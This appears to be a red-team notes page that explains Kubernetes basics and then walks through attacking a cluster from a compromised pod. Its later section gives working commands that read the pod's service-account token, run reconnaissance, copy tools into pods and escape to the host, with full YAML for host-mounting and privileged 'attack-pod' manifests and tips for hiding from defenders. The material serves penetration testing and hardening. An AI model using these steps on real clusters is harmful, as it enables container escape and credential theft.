Kubernetes

What is Kubernetes?

Kubernetes allows you to orchestrate the configuration and deployment of containers across multiple hosts. It's also an integral part of any microservice setup.

Containers are useful for a single application component, but deploying containers individually can get tedious and error-prone, especially at scale. If you want to deploy an entire application stack to a cluster of servers, Kubernetes can manage the entire thing for you.

For instance, let's say your application has a webserver running NGINX, a DB server running MariaDB, and a cache server running redis. Deploying with just containers is certainly doable, but we should work harder, not smarter! With Kubernetes you can run a single command to spin up the entire stack, upgrade each component, provide load balancing, scale the number of hosts dynamically, and more.

What Goes Into a Kubernetes Cluster?

First things first, we need machines for our containers. Each individual node in our cluster can obviously host one or more containers - this set of containers is called a pod.

When initializing the pod, we need to consider the startup costs of the pod backend and the network namespace that will connect our containers to everything else. The naive approach would be that if all of the containers were to die, we'd just set up the pod and all of the networking again from zero. However, that's less than ideal - we're wasting cycles unnecessarily. Instead, Kubernetes automatically creates the pause container, which is basically just an infinite loop to prevent the pod itself from dying if a container goes down.

The rest of the core pod mechanics are pretty straightforward. Each container will share the same network namespace and have the same IP address (beware port numbers!). When it comes to storage, there are volumes just like we'd use for standalone containers.

In order to create a pod (along with all the following concepts), we need to write some YAML. For a very basic example, this is how we would create an NGINX container (credit to the Kubernetes docs):

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:1.14.2
    ports:
    - containerPort: 80

To perform the actual creation, we'd save the YAML to a file and then apply this pod declaration with the kubectlopen in new window binary:

kubectl apply -f ./nginx.yaml

How does this pod even get created? Magic has been impossible for a while now, so we need a controller (the control plane) to create that illusion. Behind the scenes, kubectl is making HTTP requests to the Kubernetes API serveropen in new window, which reaches out to each node's "agent" (kubeletopen in new window) and decides which node can handle the new container. Once a node is allocated, the API server then tells that node to create the container within a pod, with the kubelet agent being responsible for applying the operation.

TIP

Kubernetes is a declarative system, not an imperative one. If we want three NGINX containers, then Kubernetes will ensure that there are three containers, with the controller automatically handling pod/node failures when they appear.

Now, if we create just individual pods, we're missing out on a lot of the benefits of Kubernetes such as automatic failover or scaling. To that end, we can instead create pods via a deploymentopen in new window. This is generally what you'll see for an actual application.

If we were to migrate the NGINX container to instead use a deployment, here's what it'd look like (credit to the Kubernetes docs). Take note of the spec.replicas field:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.14.2
        ports:
        - containerPort: 80

Nodes also need a way to handle network traffic. This piece is is managed by kube-proxyopen in new window, which proxies container traffic, configures iptables and IPVS (IP Virtual Server)open in new window, etc.

Of course, none of this will be a static configuration. We may need expand or reduce the number of pods/nodes, they'll be created and destroyed, and they may move from one host to the next. Maintaining this configuration by hand would be a nightmare for anything that has to interact with the pods as a collective. We need some kind of abstraction layer that knows where our containers currently live and can route traffic to them even if the internal configuration changes. To that end, you can expose one or more pods as a Kubernetes serviceopen in new window, which acts as a load balancer. It will provide a single DNS name, virtual IP, and incoming/outgoing port pair for your service.

For an example, we may define a service for the Postgres database backing our web application (credit to this tutorial by DigitalOceanopen in new window):

apiVersion: v1
kind: Service
metadata:
  name: postgres
  labels:
    app: postgres
spec:
  type: NodePort
  ports:
    - port: 5432
  selector:
    app: postgres

When a service is created, a DNS record is created for it. For example, this could be app.default.svc.cluster.local. The service also creates an SVC record for the named port. If we wanted to expose port 80, then this would be _80-80._tcp.app.default.svc.cluster.local. And finally, with the right configuration, the service will also create a CNAME record for humans to navigate to.

Not every cluster will just contain a single deployment and service, though. You may be sharing a cluster with other teams, there may be tools monitoring for malicious containers, so on so forth. To provide a level of isolation, services, deployments, secrets, etc. are split into a number of namespacesopen in new window. In other words, namespaces are logical "clusters" of sorts.

There are two primary universal namespaces to know about. The first one is default, which is where resources are deployed when a different namespace isn't specified. Then there's kube-system, which is where Kubernetes' default control plane components reside.

RBAC

Kubernetes provides RBAC because giving everybody admin privileges is less-than-ideal.

There are two main objects to be aware of:

  1. A Role specifies a list of actions for specific resources, for example listing pods.
  2. A RoleBinding maps a Role to a principal (i.e. user).

Additionally, roles are scoped to a specific namespace. To grant cluster-level permissions, you'll need to use ClusterRole and ClusterRoleBinding.

For an example of what a Role looks like (credit to the Kubernetes docs):

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""] # "" indicates the core API group
  resources: ["pods"]
  verbs: ["get", "watch", "list"]

And a RoleBinding that gives jane the pod-reader role in the default namespace:

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
- kind: User
  name: jane
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io

Reference: Control Plane Components

The control plane has several core components:

  1. The API serveropen in new window is the frontend of the control plane. You as the developer will give it deployments to run using the kubectlopen in new window command, and the API server will kick off the operations required to fulfill your request.
  2. The etcdopen in new window server is the data store for all storage-related concerns and retains the state of every resource in the cluster.
  3. The scheduleropen in new window is responsible for selecting nodes to host new pods.
  4. The controller manageropen in new window runs various controller processes to handle node failure, run one-off tasks, and more. Despite being multiple processes, this is just a single binary.
  5. Cluster DNSopen in new window is responsible for, well, managing DNS records. This component isn't required, but highly recommended for reasons mentioned earlier.

Service Meshes (Istio)

TODO

Write this section.

Attacking Kubernetes

This all assumes that a pod has been compromised first. For instance, the application that the pod is running was compromised and yielded a shell.

The core idea is to use the pod's access to gain access to other services, attack other containers within the pod, and eventually make requests to the API server or a Kubelet to:

  • Run commands in another pod
  • Start a new pod with elevated privileges/high-value resources
  • Extract secrets
  • Pivot to the cloud service provider

Prerequisite: Authentication

Starting Point: Within the Network

If you are starting from within the network, reconassaince will probably be a lot easier. Just install the kubectl binary and either authenticate or use a stolen kubeconfig file. (This step is left as an exercise to the reader.)

Once you have the kubeconfig file, you need to set the KUBECONFIG environment variable:

# TODO: set namespace
export KUBECONFIG="/path/to/kubeconfig"

Obviously this is only the case if you are testing a Kubernetes deployment or application in an assumed-breach scenario (or are pivoting).

Starting Point: Inside a Pod

In order to use the Kubernetes API from within a pod, say after compromising a web application and getting a shell, you can use the pod's credentials by setting these environment variables:

export APISERVER="${KUBERNETES_SERVICE_HOST:?}:${KUBERNETES_SERVICE_PORT_HTTPS:?}"
export SERVICEACCOUNT="/var/run/secrets/kubernetes.io/serviceaccount"
export NAMESPACE="$(cat ${SERVICEACCOUNT:?}/namespace)"
export TOKEN="$(cat ${SERVICEACCOUNT:?}/token)"
export CACERT="${SERVICEACCOUNT:?}/ca.crt"

Now we can use curl or kubectl like so to access the Kubernetes API:

# NOTE: `--insecure` is not necessary, but it will prevent cert errors.
alias kurl="curl --insecure --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
alias kubectl='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true'

TIP

I would recommend building some tooling for interacting with the Kubernetes API with curl, particularly for organizations with a good security posture. Security tools may detect you attempting to place new executable files within a pod and reveal your presence very quickly.

For the sake of simplicity (read: I haven't written this tooling yet), I will use kubectl throughout this tutorial.

Reconnaisance

For a starting point, try these commands.

kubectl auth can-i --list
kubectl get secrets
kubectl get pods
kubectl get namespaces
kubectl get nodes
kubectl get services
kubectl get deployments
kubectl cluster-info

The low-hanging fruit would be excessive permissions for the account/pod you're authenticating as, as well as any secrets that may be of use elsewhere in lateral movement, e.g. access to another, more privileged service account.

Transferring Binaries to Pods

WARNING

Security tools may detect you attempting to place new executable files within a pod and reveal your presence very quickly.

If you are able to access or create a pod, you can transfer the binaries like so:

kubectl cp /usr/bin/kubectl attack-pod:/tmp/
kubectl cp /usr/local/bin/peirates attack-pod:/tmp/

Attack Pods

TIP

In all pod definitions, you will almost certainly have to change the metadata.namespace field to not be the default namespace.

You should also change the following fields unless you want it to be clear to defenders that the red team has broken in:

  • metadata.name
  • metadata.namespace
  • metadata.labels.run
  • containers[0].name

If you change the pod name, you will also need to update associated shell commands to use the new name instead of attack-pod.

Root FS Escape

If you are able to create a pod, you can try to mount the host filesystem to escape the container to the underlying host, which may hold some goodies.

apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: default
  labels:
    run: attack-pod
spec:
  # Uncomment and specify a specific node you want to spawn on
  # nodeName: <insert-node-name-here>

  # No need to restart this pod since it should be ephemeral
  restartPolicy: Never

  # Make the host filesystem available as a volume
  volumes:
  - name: host-fs
    hostPath:
      path: /

  # Define the container
  containers:
  - image: ubuntu
    imagePullPolicy: IfNotPresent
    name: attack-pod
    # Mount the host filesystem at /host/
    volumeMounts:
      - name: host-fs
        mountPath: /host

Next, create the pod and connect to it:

# Create the pod
kubectl apply -f ./attack-pod.yaml

# Make sure it's running
kubectl get pod attack-pod

# Spawn a shell
kubectl exec --stdin --tty attack-pod -- /bin/bash

Finally, to escape the pod, simply chroot to /host/, which holds the host filesystem mount:

chroot /host/ bash

Super Privileged

This is complete overkill, but illustrates a variety of things that you should not be able to do when spinning up a pod.

apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
  namespace: default
  labels:
    run: attack-pod
spec:
  # Uncomment and specify a specific node you want to spawn on
  # nodeName: <insert-node-name-here>

  # No need to restart this pod since it should be ephemeral
  restartPolicy: Never

  # Use the host's IPC namespace
  # https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
  hostIPC: true

  # Use the host's network namespace
  # https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
  hostNetwork: true

  # Use the host's PID namespace
  # https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
  hostPID: true

  # Make the host filesystem available as a volume
  volumes:
  - name: host-volume
    hostPath:
      path: /

  # Define the container
  containers:
  - image: ubuntu
    # Adjust this as needed -- use only as long as you need
    command:
      - "sleep"
      - "3600"
    imagePullPolicy: IfNotPresent
    name: attack-pod
    # Mount the host filesystem at /host/
    volumeMounts:
    - mountPath: /host
      name: host-volume
    # Run as a privileged pod
    securityContext:
      # Controls whether a process can gain more privileges than its parent process
      allowPrivilegeEscalation: true
      # A privileged container turns off the security features that isolate the container from the host
      privileged: true
      # Run as root (or any other user)
      runAsUser: 0
      # Add any capabilities you need
      # https://man7.org/linux/man-pages/man7/capabilities.7.html
      # capabilities:
      #   add: ["NET_ADMIN", "SYS_ADMIN"]

References

Defending Kubernetes

For a general reference, check out the Kubernetes Hardening Guideopen in new window. Even the introduction provides some good high-level guidance.

The most important thing is to update your cluster frequently! Development is very active, and releases come out frequently. Support for specific versions only lasts for 12 months (used to be 9!), so if the cluster is older than that, then there may not even be any security patches available.

Last Updated: